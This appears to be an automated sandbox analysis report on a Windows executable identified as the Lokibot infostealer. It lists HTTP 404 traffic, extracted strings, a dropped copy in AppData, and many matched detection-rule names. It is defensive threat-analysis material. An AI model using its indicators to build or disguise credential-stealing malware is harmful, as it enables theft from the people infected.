              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
              Source: YvVDV4cbjy.exe, HxQXdrrQ.exe.0.drString found in binary or memory: http://localhost/calculator_server/requests.php
              Source: YvVDV4cbjy.exe, 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, HxQXdrrQ.exe, 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: HxQXdrrQ.exe, HxQXdrrQ.exe, 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/

              System Summary

              barindex
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: YvVDV4cbjy.exe PID: 736, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: Process Memory Space: HxQXdrrQ.exe PID: 1632, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: Process Memory Space: HxQXdrrQ.exe PID: 7096, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeCode function: 0_2_013C3E280_2_013C3E28
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeCode function: 0_2_013C6F900_2_013C6F90
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeCode function: 0_2_013CDFB40_2_013CDFB4
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeCode function: 0_2_077B9D680_2_077B9D68
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeCode function: 0_2_077B56500_2_077B5650
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeCode function: 0_2_077B9D590_2_077B9D59
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeCode function: 0_2_077B3D980_2_077B3D98
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeCode function: 0_2_077B64380_2_077B6438
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeCode function: 0_2_077BCBE80_2_077BCBE8
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeCode function: 0_2_077B5A880_2_077B5A88
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeCode function: 0_2_077B41D00_2_077B41D0
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_00D93E2810_2_00D93E28
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_00D96F9010_2_00D96F90
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_00D9DFB410_2_00D9DFB4
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_06F9900910_2_06F99009
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_06F9565010_2_06F95650
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_06F9BF6810_2_06F9BF68
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_06F9643810_2_06F96438
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_06F93D9810_2_06F93D98
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_06F95A8810_2_06F95A88
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_06F941D010_2_06F941D0
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_071F08A410_2_071F08A4
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_071F251810_2_071F2518
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 10_2_071F08F810_2_071F08F8
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 15_2_0040549C15_2_0040549C
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 15_2_004029D415_2_004029D4
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: String function: 00405B6F appears 42 times
              Source: YvVDV4cbjy.exe, 00000000.00000002.2067776523.0000000004048000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs YvVDV4cbjy.exe
